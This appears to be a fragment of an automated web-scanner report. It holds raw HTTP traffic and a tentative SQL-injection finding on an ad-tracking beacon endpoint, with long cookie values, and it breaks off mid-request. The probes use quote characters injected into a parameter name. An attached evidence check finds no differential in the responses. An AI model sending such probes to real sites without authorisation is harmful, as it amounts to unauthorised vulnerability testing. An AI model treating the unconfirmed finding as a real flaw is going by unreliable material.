GET /b/ss/djglobal,djwsj/1%00''/H.20.3/s19508665378671?AQB=1&ndh=1&t=16/5/2011%206%3A22%3A20%204%20300&vmt=44BD02B1&ns=dowjones&pageName=WSJ_U.S.%20Home_0_0_WH_0001_public&g=http%3A//online.wsj.com/home-page&cc=USD&ch=Online%20Journal&server=online.wsj.com&events=event12%2Cevent17%2Cevent64&c1=Home&h1=Online%20Journal%2CHome%2CWSJ_Home%20Page%20Public%2CWSJ_U.S.%20Home_0_0_WH_0001_public%2Chttp%3A//online.wsj.com/home-page&c2=WSJ_Home%20Page%20Public&h2=Online%20Journal%2Chome%20page%2CWSJ_Home%20Page%20Public%2CWSJ_Home_U.S.%20Home_0_0_WH_0001_public&c3=WSJ_Home_U.S.%20Home_0_0_WH_0001_public&h3=Online%20Journal%2CWSJ_Home%20Page%20Public%2CWSJ_Home%20Page%20Public%2CWSJ_U.S.%20Home_0_0_WH_0001_public&v4=WSJ_U.S.%20Home_0_0_WH_0001_public&h4=Online%20Journal%2CWSJ_Home%20Page%20Public%2CHome&c5=http%3A//online.wsj.com/home-page&h5=Online%20Journal%2CEdition_North_America_USA%2CHome%2CWSJ_Home%20Page%20Public%2CWSJ_Home%20Page%20Public&c6=http%3A//online.wsj.com/home-page&c7=off&c8=WSJ%20Online&c9=free&v11=Online%20Journal&c13=undefined&c19=home%20page&c20=0_0_WH_0001_public&c22=WSJ_Home_U.S.%20Home_0_0_WH_0001_public&c24=Edition_North_America_USA&v25=WSJ_Home%20Page%20Public&c26=WSJ_Home%20Page%20Public&c27=WSJ_free&v29=WSJ_Home%20Page%20Public&v31=Thursday&v32=6%3A00&v37=WSJ_Home_U.S.%20Home_0_0_WH_0001_public&c49=2&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=893&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: om.dowjoneson.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/home-page
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72A64051D1F1F-4000010980086687[CE]

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 11:40:50 GMT
Server: Omniture DC/2.0.0
xserver: www438
Content-Length: 0
Content-Type: text/html


1.11. http://r.turn.com/r/beacon [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://r.turn.com
Path:   /r/beacon

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Evidence check: Response 1 and Response 2 below are both 302 redirects to the same Location (http://ad.yieldmanager.com/pixel?id=1210787&t=2) with Content-Length: 0. The only bytes that differ are the freshly issued pf cookie and the Date header, both of which change on every request. No error message of any kind is visible, so the differential the scanner reports cannot be reproduced from the recorded traffic; treat the finding as unconfirmed.

Request 1

GET /r/beacon?b2=uAuceuD961GAkMIYzv5AQziOQ-eCNWHV6KkD_P0UpEIHL-lTlput787BXKmhwi2DTI-ZOLCjHLM7w-8RpLcB7A&cid=&1'=1 HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=3076801;type=homed040;cat=homed063;u1=undefined;ord=5328984577208.758?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=QM70Whve3yMvxkhKlZSDFc8jBjr9GZaXPVHd3KPTbrVh-L3XcPmT4hHXOQgApIlYYCcoFPzHtthoKoScENuCacAfwlpOGZwMiTYKzkLyV6yLZO8TKZa-nLTQQ4a65pbCg5Ip47iYWcr2TLdwTDr0L4oBBpiyP3J8NU50OkfeFof5nfT0WqmMXNTAO47jNWqP9DMJbnJ4jgxRBVKYcWOOoBo1vu2lsqV8DN9Vps5BPlmPLL60Ne9Ei9t17XStRc4rGERgBg46FC_PZzOaKvw_-cZloB2cEevUSjzsvfqJ8qZhgZ9g0kmeR-0KBwkm_b3-nHDVWO4oEVu9LZTNJAoERvvIJejvF6b257maU3ML6OZFn0pS1M8s2KPrvUfPPF0_ewHYGlNdqDaG9FYWPprE_WjI_lsRoaOz7-O-vgmKJiTz-KIh4eZr0ecbMlDpVZu91zdW0hE-4eLwR7bomsP7JSdqWSoz4sC-t192PZJ_v5Q-P1VlQMzPKKE64Al6GE9_qQBVWHaPX-roIWbRumWL1-XpDwD22ZRNSBnUmAd0wjxC8t8bNFJSd1YiPEk8t_65cnD2Yeg02hxYDcV4Js2beeQ5R5-3xXfzzH2krAPRf428tdb3ea_CHM6GXs7htoYXSpzxUEP4Lawlcjwmuu0sgABXItk3mefJp5QRHv4O0nQLT7vqCmjKMUnpRJ6SJsSELsnefots81rrNB8RkZzwt9xgKqCmjZaalMlFzn1gedMiR83opqf2DdmsWkwVThPxhyYcbbPOXHwjOkupykmG8XHU2Z_bwsvqeY5PpknKks9Ka5pRG06H0tQ1iybpB3pDqsDA387b4GyTrdtR0OxRq1W2-clEv_ue7qpjwh19AlSzwxLx1pBhUX4CYwoSQucKtJqb949HbLP0at-l-Te-c7NLS367-cid5bH8-bJWmY8nC9B9w1ij88w7eqsM7UhZeuq4rrlofmxpvpW8sH43ef-7J7zFZpaqjQcGC_vq5exjB6sqt4Mo-GvkAj2qErRL9pWBI8bQOJli1okJuMhLcQljneDOkY9olIfd-ve5Qn4-P1VlQMzPKKE64Al6GE9_6W9aRH84b2cB20BvmgB1t-XpDwD22ZRNSBnUmAd0wjyOWY3k4-itBWJe_k62xWOCrFV4LhRdbHCAEu2Xc3dVj-Q5R5-3xXfzzH2krAPRf418WpxTiSnvzOJ-ZkQfvNQASpzxUEP4Lawlcjwmuu0sgAGs1MSewshLM0Q6GhK5Ns8fU1J7JmYpzzzNP9hB_wUy05oRsNhTbhcD1_xCDQojfMSuZLsISBijKSjMDSgLlyDjsNAVa5Ct7DxoA1avkLsQ815KVjL9JqXyOpgagVKRMbntt6vzlmgFJ9k1Zzq45WeFCQUiSJFaYOp4MQlbe-RFUEK9KsJrC9CLkGJUacP7jEa1wTMgEYoXiZA8_W3FI42qThwrh-6wCu7vlgqZNOXixmWgHZwR69RKPOy9-onypkTIcQzOQc65c9KVO3IQPv8Yd11jfaAGeomVXk2jyqz756mNhe7mBUb-nxi7SHg4OCY4fQNDPmLA1QCvKDvVxcR7AdgaU12oNob0VhY-msT9lb_ydeK6sfV-VwC1t6PXZrSU8zXCbuEO-Hn-xUU7T4MdZMXr1rBrtZHchRIeH_p0MQswiaZbyLrfvl0j4wXxTj4_VWVAzM8ooTrgCXoYT3_ukoy-I69c7SrUTlHbB6rZ5ekPAPbZlE1IGdSYB3TCPPtQxe5L3Tuc-yk0WOEmJZ9iOsnV5UjcUOjnXUSJzJan5DlHn7fFd_PMfaSsA9F_jfnYBNZ11ca-Wgmkknbh9eNKnPFQQ_gtrCVyPCa67SyA_xeh6xaAKc9mefeGrL2bordkSY3wrTx66nlJUXJL2YzTmhGw2FNuFwPX_EINCiN8l08PBB5hX0JN8MvjDOsPSeOw0BVrkK3sPGgDVq-QuxAsFTUl8EdeBakl_JEHs
yGF2Jfo-RxTjyjBkOV794zNZ0kTA-aymPAds4qYFrApgUvcPT0oUz-YZYVaDcHqgl-9xmWgHZwR69RKPOy9-onypimfvYrBKXvtznWuT43S50y-3u16r0dKm_zz3ndHe3WlG-QgtH60dqlqdrI16uF-EVNzoshUKoWhiHnNcI8oP4V7AdgaU12oNob0VhY-msT9kNb2AdwFV5i2vxwzlIKJ3BfY904hG-_CHlEd9j-vzfzk5Jifrc9V1OOzEX32QifKI3TThUmivC2QQLLhMmAROj4_VWVAzM8ooTrgCXoYT3-ZdIfAS6iVxgYyOedo9Ki95ekPAPbZlE1IGdSYB3TCPEX3xTtUTn7ghX1OdIngM2q-RWnunI4BlM040X2RcB965DlHn7fFd_PMfaSsA9F_jUBCGuQvL_fhodmVMnOIMvBKnPFQQ_gtrCVyPCa67SyAw4hmx2eXEqzbsKwy_MNlFfUa0Y_5ftklciMdgbQhb_wbdYORBXyNJvBU7ewnBysYP_zg1-oPoaJCGGP6Vt55Gz_84NfqD6GiQhhj-lbeeRs__ODX6g-hokIYY_pW3nkbP_zg1-oPoaJCGGP6Vt55G1OKf083dm4Ocqz5E2RJpVu9TfQkOcNz7DOIIZP_23WvvU30JDnDc-wziCGT_9t1r71N9CQ5w3PsM4ghk__bda_nUnHYqNkC6RPs4-2B8pJoMqCuwkKr26TEWeaS686ExCPxJGFKBs6DSrH4oyWVjhIBdxGEbgsgCDz8r26d8pRZAXcRhG4LIAg8_K9unfKUWejxkXIMl02q9l3ycv51k_QH1ePXpCkOqUdD3FJ26E0LEgnOhSnZw4WOirtIvKWwJRIJzoUp2cOFjoq7SLylsCUSCc6FKdnDhY6Ku0i8pbAlEgnOhSnZw4WOirtIvKWwJTJGg5u5RuPReUxP5byb5LGsjsJdNDz0zBLNR8ReLDcirI7CXTQ89MwSzUfEXiw3Iv5E8JDY11x5xog0GskBswr-RPCQ2NdcecaINBrJAbMK_kTwkNjXXHnGiDQayQGzCjVgVkoy7DysIPcuC3AUG0sb1BDdWaxOURi_bqX1S5T5G9QQ3VmsTlEYv26l9UuU-W___E3ohWz6drp_rI2j18pjDJAj7Gbh3rF9uN2-5_zdRHqYmtLfdK6unD4Xv15XLH0evbFMdkuI2WqEUI01UYXDJU38vLMvNPfD69rioBNl6-78JM-YwVK9vMhQzP5aE-vu_CTPmMFSvbzIUMz-WhPr7vwkz5jBUr28yFDM_loT6-78JM-YwVK9vMhQzP5aE-UaEwuQGXrKf1B0pg93pQC8wfsfoRTDgpAqCg9KVA9UvMH7H6EUw4KQKgoPSlQPVLzB-x-hFMOCkCoKD0pUD1S8wfsfoRTDgpAqCg9KVA9U-Nxmcu6N80G4H7yE1a6GL_jcZnLujfNBuB-8hNWuhi8zo63SsMKXllQ8R3TROrVZwRV4qFgI_yJZybaj30x3rZThUGsgezmPZdo0hiRJAEU2UlTEERLOiMahUz0Je5vrQpUNsf8ubz28dE3HpFhXM4HLQRF00hhIXSJp9kwMyEKBy0ERdNIYSF0iafZMDMhCgctBEXTSGEhdImn2TAzIQou93XF3r4cgLiZIl0wssIM; fc=c8voyByxtfmxf-PR5HgfpjgORIc3Od-xFb-8M8t9VWkz6wrQqI-cCCIP4q7JSoro0YGlpSJHEwaZrD9xrQykZRLTM2UWqcEggsPn2JlFm6WKJ47y0SjHASrSoX2-_RWGR8GD8YL2uMyYOovbWSVtT_OjMRX_o6D3TvHXeB0H3IoJPxIPX2Q6BIRFliap-hOlRK2X8EADYMp4JB-33zSWnLP_4lD6MCBjT4SRxTIxlhNKLFBAG3Fk9H3_mDAMZFkDVnBVtdUIoJ-JIgllkJFaAJbHZLznezJA10wgg7oc-ufuxx6wPWxSLH-VTpbekwI2; 
pf=bskS8Lli70BjXEzd5NYfF8V9tHnIhHPKzn-ZptMbz3NTv4g2_4PHk6pD33NmTL25iyDxX-e5nvqK08ftGFlNZcB-blYU8Y2b3uGZySbN9k4boogWXDFyI4_-RvN_buohq-dHAl-abYU1X5bYp5n9Cdcc1kdI2OrvyH13NxBc5ZZblSYEdunA88QWsswFnK34IIbRFAp6kq4cSFltcxEru3wiHybxFoqFMdQqHxwvVjx7zBU2vT3hB9b5_A14u9LALQcduwwYmRsag5v8ztN6UjLmZCeHJ6h93qhIv-rUsPdbHJlod6TESSrv6Thxy6WamFlDf1zNmpUN4p-XWvhOtwyxeWnRI3qk58dH_r-y85DlfxWknFJRlb9hzn2M2frNMEh1GRb-PuEMe2Z7syUFVcpaPHcpz9cpkPkyFl8KnA3kFjox_1jCVFJu9ob0C05NyZFnUVV8zZwxZ0Jqede_6SEBTTPtCItPvtKKOGZm7eRvub6YMtD_axmOFpwTegZ0Ik_TZHzQHPkidsWQCuARecCEpqUhieOSE4eC6JSVC4Kb2gj1O0-Z-93OhvmeJIXktssbq-UJ0gwP_tjxgElGHyc6m9bbAQkPtkmDiMOswjx_rgnZHXFHutbbxwpp0mzc0f3MrVLB8Sbr0OplZ0YmpQ6pPLr5WGwJSCaSLyPeD8tW8QIeq5GdjjA2VLfSe86B_U2uPTCuMGNYOoaYgaTljvNEkx61aa1aewp4qtmGVPek9QMkyjNbxjUHQBR4E4B3AGUJgKTp8qs6Sh239g-tJFoqZVBpLhgL2E7flNbkDPo6oQ9T128OqIjRPGIgGqJ0U92zB6HrH6sGkt833E2I0kS2ttJsutMRJGOYaR-soWsrqivW0mVJFXQS3dhrTE8SaKKXBxFLQC_mPwxjkeL_DORS4P3pxhLoRgihOxnoSsDlCw2HnM4YLv0kpO_GVKupX5sc0C6btaAdqNlMlZs4oTCY_AT5rVNqw6Tz15xoxFpBYNWUpIQcuBazjzssqEIPZ5bfZwZFU6nN1pDVXOYaJ8DdOZYF55d1PpfBxPHyuH2RHojg75w7am5jitqGicFdbR_ukiIJxkBku1CxquV17mPFnSRDfouZL6wYhXooxR9ULrxpvguFI2ofDAIOd3EuO9yXy3nBEXqSScPA5E39O2_zg7l3tDIiyF94B5aERskWHv8BOnUkNaZrdPIQNGZqdwsP9I0MRtXw8xQWWbNPUyQsdjE_Scn2QYUNUmcT7rDH85LuW-sDtP4uwhJo9atGrEPrXDmdsIAOzEayx_QQ10pBlWBp0q8wJgIWBSuNhQqif26eEkDb5MRTYvSKoQwNXOBQsIqeIWsKbow-3MTFvdSUC5aHu9blDf32RjYS8Q0XMZuh1ZAgzt41nq2NRCSX590hwfiGo-qcVT2kvWmzeR7b1paN0zLvFemp5AQnABOzIFk-pYt5rgVKJ87aXtgPb-mafaJ5_5dz5FYF2gdO3-RhTnUyFltTQjNRcqU7m_5Dsdg2BVOoqsZOS_mkJdfuPEzm6ziEo1_QjXTUZsQGb3aBmo_VB_3afAvA7HmJ70VD1x9GqiaHujprGHOBA7aEDie69XnZ9g3UdQ8qboT72h45foF_fR8Dfspr5EIo6mININ0MwGURZOI6NOy-sr20mDmWfrauITMqFQqh085LSKQUL7YGM0pJp1-FIztq58QhVWy6LSDOwot2ckvPUzkd-FnxN8NhVB8sqANsWORR78w7iqAGDudyRR4sGrjr4yCu4BPZ9sxxEAJuqkU9WhgK5HyS-jWx86QRjwbOSlxW_AShejO2Api9OqW7wGthrtivajOoHMt7EKDIqFqYM0LalgBhHGk98NLPXedpy1UU1G0p61bv1d1Qe8RvD9O3tReDwxPBbZMzCCP1zNubGNg83l1aV51TfDhTgj1yUZOWuS-pj8W99_7k59ODgmGDUx1RLP4RQV5YsF7eRC_oBFtd7vTs-bMZZ3cr3
6hzZbdHwcgMjIQ67GgiGFnif7dZxa3qqTs_pw5jFRYMsjf2CDWROI6mFHsv9rileAh5u94Tal8X9jZGPmZVvtACyANcU61_2D_gjytCfJX5eIYzCUnD9N0uTPecPGlXnt0zeFF6nGhy-4kHkvuGu7mFLrHknQIOqyVa7C5Vcz2ztFo648TLIYncavW2EU0-FxAowg7Q_J3_JUWPrldWd5VL7X-3ELxQm3QGLlDe9QHA7dTmmKmFxV0767zf8vh0-XU0u6MJx4viNkNYwNHgm3A-Zsn_tb2nFJRjBcEMxdDM5u496FsXzZoCQNrRn4Nka-1SbHAlq1j0766BFlUYsZHI9nvDUSjNUKoFWTkAUa-o1j-LL1ebdsaBpOZQwog1WHvup_q5MU0eWf_8Tnz19zggAp1l0o0E-qtSYNUJ36V_bsysgOo8ovHlz0rw4urFgweCpjhoovSxZ6xAsLQbFPBlhboS688EaXiGds-5scOf0AWtR0WtyJH-06RSCV4rzVRndoxKQ6xvTNWKSQfuYds5-6wqXTrrprCUxSH31llwL8axfVJ0d6h2Ke1Lez9-eYMqCkG4uUOXcVRZwxg85KAU3HRwHZ-EWY6qIaKdc8DaRYJXxJzEtphWqdWwTUQc6r3kmRMNC1ofRqXiWAg7U15-Vq8fXUTyQ-Foh2RKGC89bCSZhuIo0DelrjnD_y1FdMAK6632Po5svz9Xs-GXO_PYmIh52EUXzRY-jfWrhp-btGaCKGToFYaTe9bd1jKXwduyoimxxjrfcWCeJq1txaaBU_3Uczg1vUpNInXslg4NWbOv3i1AMVsxWmxcjn77s3i60QHhTEr6gILrU4PmsHL3FqzwzpkTuJbzWi_g5eyZHwtMfpYoYwULodolIu7euVx1T6-kom1lfGeK534YvRLg1f6xfa7TbJat7GFUh5YcwiKTv6i2BObi71nwu2712ua_zaapTMdVqI2HeT5VUjRYlLwTM6Q4btGEdG0d_jWUX-DJJ6s4pWL_6FerjeM6JRh-LuLiaWTXIluKkF9otMRxuQA1xZO-l_PyGdq8ZIdQBo46D090aTaKlV1enoq-_ZVUdLnFjEj8JuvB_NmaEIhlkkUtL2E3UODDMR1tOQu8PjS8RbchSrxsTjxxMOUEsUJ_Z756RnNmhOA_TD07hZfxuz8bhfLCVULYz6Ok1J2_QA_kXIY92iqRVh1b6IbTDyOALqZNl5K11KDpAXL1nqDbSN94B3fAGfWH1075KVzt7-y7v8wzj5HvH-kwIHXGh1rq2Sy1u7pxUuundR497HrST_MMHxNG2Kdut19FcHWUqjUfID5JAiaS2fFEZWuWIqjpSvJM2ivPIAO7c_zUdwbkiWS8ejzieFqJCa8rSsS_dWSQq-Icz8Io9aHLgwbQxkFBxTOEAWmKRZWPfJkX_p8vFnb1Nu9kYvRadgXAM7qphVq6O0Tj; uid=4325897289836481830; rrs=1%7C2%7C3%7C4%7C5%7C6%7C7%7C10%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12%7Cundefined%7Cundefined%7C1008%7C13%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C18; rds=15138%7C15138%7C15138%7C15141%7C15138%7C15138%7C15138%7C15110%7C15138%7C15138%7C15138%7C15138%7C15138%7C15138%7Cundefined%7C15138%7Cundefined%7Cundefined%7C15138%7C15138%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C15138; rv=1

Response 1

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4325897289836481830; Domain=.turn.com; Expires=Tue, 13-Dec-2011 12:18:44 GMT; Path=/
Set-Cookie: pf=HI1kW9dDuzsAawNB3xfEnPgJlEfmrZSLb2NQk53Jdt9pZRM3I2Ow27XFAiLSy6gtZDpM35cC-2bkiEEmtUQhePVJa14KJhbEu9o3nKnVB4nX05cOjEpT2HyHBma2S3H4q-dHAl-abYU1X5bYp5n9Cdcc1kdI2OrvyH13NxBc5ZZblSYEdunA88QWsswFnK34IIbRFAp6kq4cSFltcxEru3wiHybxFoqFMdQqHxwvVjx7zBU2vT3hB9b5_A14u9LALQcduwwYmRsag5v8ztN6UjLmZCeHJ6h93qhIv-rUsPdbHJlod6TESSrv6Thxy6WamFlDf1zNmpUN4p-XWvhOtwyxeWnRI3qk58dH_r-y85DlfxWknFJRlb9hzn2M2frNMEh1GRb-PuEMe2Z7syUFVcpaPHcpz9cpkPkyFl8KnA3kFjox_1jCVFJu9ob0C05NyZFnUVV8zZwxZ0Jqede_6SEBTTPtCItPvtKKOGZm7eRvub6YMtD_axmOFpwTegZ0Ik_TZHzQHPkidsWQCuARecCEpqUhieOSE4eC6JSVC4Kb2gj1O0-Z-93OhvmeJIXktssbq-UJ0gwP_tjxgElGHyc6m9bbAQkPtkmDiMOswjx_rgnZHXFHutbbxwpp0mzc0f3MrVLB8Sbr0OplZ0YmpQ6pPLr5WGwJSCaSLyPeD8tW8QIeq5GdjjA2VLfSe86B_U2uPTCuMGNYOoaYgaTljvNEkx61aa1aewp4qtmGVPek9QMkyjNbxjUHQBR4E4B3AGUJgKTp8qs6Sh239g-tJFoqZVBpLhgL2E7flNbkDPo6oQ9T128OqIjRPGIgGqJ0U92zB6HrH6sGkt833E2I0kS2ttJsutMRJGOYaR-soWsrqivW0mVJFXQS3dhrTE8SaKKXBxFLQC_mPwxjkeL_DORS4P3pxhLoRgihOxnoSsDlCw2HnM4YLv0kpO_GVKupX5sc0C6btaAdqNlMlZs4oTCY_AT5rVNqw6Tz15xoxFpBYNWUpIQcuBazjzssqEIPZ5bfZwZFU6nN1pDVXOYaJ8DdOZYF55d1PpfBxPHyuH2RHojg75w7am5jitqGicFdNChmr2gqp_bsTKTrtZC7Y3cLD_SNDEbV8PMUFlmzT1N9YPgaemwV3BBfB2-m9t7qefjWJ08BK2ctlCFJWHllBcY00BkCo-YMNBmpIV0ZOtg-Nxhuomzdm6hE0tcxs0HIGvNZ_9yaKOud870irbVUKqwOqoRBUYoZ_aUn4XStK87HYLNjBqQu5e4uk0BeNmDUKcNEfcAeYlISy2E23H0Ey0RTtdyXjRdrIljs2JT4IBCp42oZQTOhvc81rn-hYQRZnDf7y9COK-FY-2ugXVqjQS-pj8W99_7k59ODgmGDUx1RLP4RQV5YsF7eRC_oBFtdhPG7W45xYyr6F0BCB3Y3jIYuZQwHeZWSJ7L_4jNc_fcy8Q5Fz6SgXPEIAbAI8Ia43mIE2YKEWi-B1LzswOG8tiMF6xinJIIFkTYszxV8xxVqy4iGInEgJLf3DRUumLHOXbNBGeqtHrtmsNUfxy0oJ5OXAKNQ1n-dyOqIH5RV7O5q2tR0Aw1HwdNZZVS9ryqsqXuaGow2-P7K3E6seeRdID7U4lziJVOheqyzs6aPfQpaefMGOCvGovGjA2C6kGk6qDVb8Ctumm-g06ANh58ShZXS85UlTI-Ms8315rZDyMXvc1WWsvixV9w_JwyrchfF403Xtt73ImjClAHeFE527hZ9sYYolc0xNkbs21o9RHXdT108p4cswCVHF9aJXWu46W3EfgdIzTSDASgBHY-_d87UupVePEsgR-UIuzJKKpX0bxLcq_C7AWUMkXDWLJlvjquWC7Gk8YZnpPdByut-OS1jPhEo7rRlyzkCvvr2ak_dIgdlxoHfpwnS_HG4q3Ex0bQgW10uuAOxZq7T6pargjZ91aET7gu1wHxeczq5nxznV9VyZYSWSGOlzD0OagD_q
xPuFg7pTdahuj804NF4RwpfxyO8MinPH6Qe4MZA9Ca5rVVPm7uyji591PMj93X-XVtndwLXwwX42fVwVpALmt1-V8hJ2wLngXVcwmpJcmIVvr-UGtnHjdubqHJRmWt2ucOMTnegTPjwuur0G3GFJ3s_1jLC37hD3a7XYeOxJDJd9fJMJZV8ay1vizL8GtAwugm4v0Cxwh4L6eS4moQ1bjXF1tj7JMOrQdTUwyOTILZIr1D_ZNf38Z-XJwgGExQHTvWHwHTF6ZvpeTqw9vx7ZteHdharQ8kdaCxkUnsg0m5bzcb7E4YgboOUnmZLh-LKm7oV7a2G__-JxYjis-sAaLoAMwpDwQwfc69gRpYn_y7-ZD75er7BUydw547KPtbXosP9bnnd0OZLFPEX78KsyR75gjh4XIZOCPW3r_hr7AcJ3ngTaN4teEYEORDeDj4g3rZ7rDDNT6U0ZCXY4sSAUxf97koNRHrmwTXDEXbACeL4CjKRNvO1XFYCJkVXlDj6xX2UKsUIMQFup1JBC3sqAlwwL9bpfkuhDHdXYKRG9_5RzwHK6FKcS7w1cxEVEDeUPLyJsufYvZN1YPHO-OvVi5FCnRJS-gZ_0m2w3Vv462a0R7DEvhubXRx78mLhvin04_PDzQA62eGzSyPpa5D8VoVL3nYT-8Na4x0ynR4fvinviFGMLv3tNjtrp7smlbrsTcekN1EBAA1tKK3vI_26Aexhdo9ejFCDobEVyhNvVqJQinyqTP5l-pke17GNYuVES9bgQO-70qoZt975PqpkGES5gmUY80_gzDQabSIGDx8NGTMtFXAXF4KcPnlEt4B1_FhhxOiLtoiA3m7onhzh-TJc88tEfwDGbxnH_j1h-NtVFTKdRNhtT0fDJE-__QeonnnzZXsc9K80-WU_VLBsdQNA2PYXH3Rff0knxJcVZ7Chz4FJJ_TMv03yL7XPeYtr4s0GKf3t057ZF4_jL2ifoo0t0noToysMQ98IGemf7gcP8sUOs_epJQ8gyIjVMYX2SuE1jSJBqGoTNfCkFA_1FMJLxHxDTLD68RZNW115CcBbPNgZZKRiXKaLKD62rQnfDWK35o0A7w8jrj3wOje0h3VO65HFl2Qkz1aQHw1bkZ4UQ7kl9hQMcyi_uXiusieb9oqny7NzWYCf6XmrNS7dZQ8PQj4xieKYCskpNEszFxo3mJb3L1KuEkRg2vcFf06O; Domain=.turn.com; Expires=Tue, 13-Dec-2011 12:18:44 GMT; Path=/
Location: http://ad.yieldmanager.com/pixel?id=1210787&t=2
Content-Length: 0
Date: Thu, 16 Jun 2011 12:18:43 GMT

Request 2

GET /r/beacon?b2=uAuceuD961GAkMIYzv5AQziOQ-eCNWHV6KkD_P0UpEIHL-lTlput787BXKmhwi2DTI-ZOLCjHLM7w-8RpLcB7A&cid=&1''=1 HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=3076801;type=homed040;cat=homed063;u1=undefined;ord=5328984577208.758?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=QM70Whve3yMvxkhKlZSDFc8jBjr9GZaXPVHd3KPTbrVh-L3XcPmT4hHXOQgApIlYYCcoFPzHtthoKoScENuCacAfwlpOGZwMiTYKzkLyV6yLZO8TKZa-nLTQQ4a65pbCg5Ip47iYWcr2TLdwTDr0L4oBBpiyP3J8NU50OkfeFof5nfT0WqmMXNTAO47jNWqP9DMJbnJ4jgxRBVKYcWOOoBo1vu2lsqV8DN9Vps5BPlmPLL60Ne9Ei9t17XStRc4rGERgBg46FC_PZzOaKvw_-cZloB2cEevUSjzsvfqJ8qZhgZ9g0kmeR-0KBwkm_b3-nHDVWO4oEVu9LZTNJAoERvvIJejvF6b257maU3ML6OZFn0pS1M8s2KPrvUfPPF0_ewHYGlNdqDaG9FYWPprE_WjI_lsRoaOz7-O-vgmKJiTz-KIh4eZr0ecbMlDpVZu91zdW0hE-4eLwR7bomsP7JSdqWSoz4sC-t192PZJ_v5Q-P1VlQMzPKKE64Al6GE9_qQBVWHaPX-roIWbRumWL1-XpDwD22ZRNSBnUmAd0wjxC8t8bNFJSd1YiPEk8t_65cnD2Yeg02hxYDcV4Js2beeQ5R5-3xXfzzH2krAPRf428tdb3ea_CHM6GXs7htoYXSpzxUEP4Lawlcjwmuu0sgABXItk3mefJp5QRHv4O0nQLT7vqCmjKMUnpRJ6SJsSELsnefots81rrNB8RkZzwt9xgKqCmjZaalMlFzn1gedMiR83opqf2DdmsWkwVThPxhyYcbbPOXHwjOkupykmG8XHU2Z_bwsvqeY5PpknKks9Ka5pRG06H0tQ1iybpB3pDqsDA387b4GyTrdtR0OxRq1W2-clEv_ue7qpjwh19AlSzwxLx1pBhUX4CYwoSQucKtJqb949HbLP0at-l-Te-c7NLS367-cid5bH8-bJWmY8nC9B9w1ij88w7eqsM7UhZeuq4rrlofmxpvpW8sH43ef-7J7zFZpaqjQcGC_vq5exjB6sqt4Mo-GvkAj2qErRL9pWBI8bQOJli1okJuMhLcQljneDOkY9olIfd-ve5Qn4-P1VlQMzPKKE64Al6GE9_6W9aRH84b2cB20BvmgB1t-XpDwD22ZRNSBnUmAd0wjyOWY3k4-itBWJe_k62xWOCrFV4LhRdbHCAEu2Xc3dVj-Q5R5-3xXfzzH2krAPRf418WpxTiSnvzOJ-ZkQfvNQASpzxUEP4Lawlcjwmuu0sgAGs1MSewshLM0Q6GhK5Ns8fU1J7JmYpzzzNP9hB_wUy05oRsNhTbhcD1_xCDQojfMSuZLsISBijKSjMDSgLlyDjsNAVa5Ct7DxoA1avkLsQ815KVjL9JqXyOpgagVKRMbntt6vzlmgFJ9k1Zzq45WeFCQUiSJFaYOp4MQlbe-RFUEK9KsJrC9CLkGJUacP7jEa1wTMgEYoXiZA8_W3FI42qThwrh-6wCu7vlgqZNOXixmWgHZwR69RKPOy9-onypkTIcQzOQc65c9KVO3IQPv8Yd11jfaAGeomVXk2jyqz756mNhe7mBUb-nxi7SHg4OCY4fQNDPmLA1QCvKDvVxcR7AdgaU12oNob0VhY-msT9lb_ydeK6sfV-VwC1t6PXZrSU8zXCbuEO-Hn-xUU7T4MdZMXr1rBrtZHchRIeH_p0MQswiaZbyLrfvl0j4wXxTj4_VWVAzM8ooTrgCXoYT3_ukoy-I69c7SrUTlHbB6rZ5ekPAPbZlE1IGdSYB3TCPPtQxe5L3Tuc-yk0WOEmJZ9iOsnV5UjcUOjnXUSJzJan5DlHn7fFd_PMfaSsA9F_jfnYBNZ11ca-Wgmkknbh9eNKnPFQQ_gtrCVyPCa67SyA_xeh6xaAKc9mefeGrL2bordkSY3wrTx66nlJUXJL2